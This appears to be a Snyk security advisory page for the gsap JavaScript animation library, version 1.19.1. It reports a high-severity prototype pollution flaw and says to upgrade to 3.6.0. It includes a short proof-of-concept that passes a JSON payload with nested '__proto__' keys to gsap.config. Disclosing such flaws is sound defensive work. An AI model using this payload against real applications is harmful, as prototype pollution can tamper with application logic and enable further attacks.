gsap@1.19.1 vulnerabilities

GSAP is a robust JavaScript toolset that turns developers into animation superheroes. Build high-performance animations that work in **every** major browser. Animate CSS, SVG, canvas, React, Vue, WebGL, colors, strings, motion paths, generic objects...any

Direct Vulnerabilities

Known vulnerabilities in the gsap package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Prototype Pollution

gsap is a GSAP is a JavaScript library for building high-performance animations that work in every major browser. Animate CSS, SVG, canvas, React, Vue, WebGL, colors, strings, motion paths, generic objects...anything JavaScript can touch! The ScrollTrigger plug

Affected versions of this package are vulnerable to Prototype Pollution.

PoC

gsap.config({
autoSleep: JSON.parse('{"__proto__":{"__proto__":{"polluted":"yes"}}}')
});

// gsap.defaults(JSON.parse('{"__proto__":{"polluted":"yes"}}'));

document.write('Polluted : ' + polluted);

How to fix Prototype Pollution?

Upgrade gsap to version 3.6.0 or higher.

<3.6.0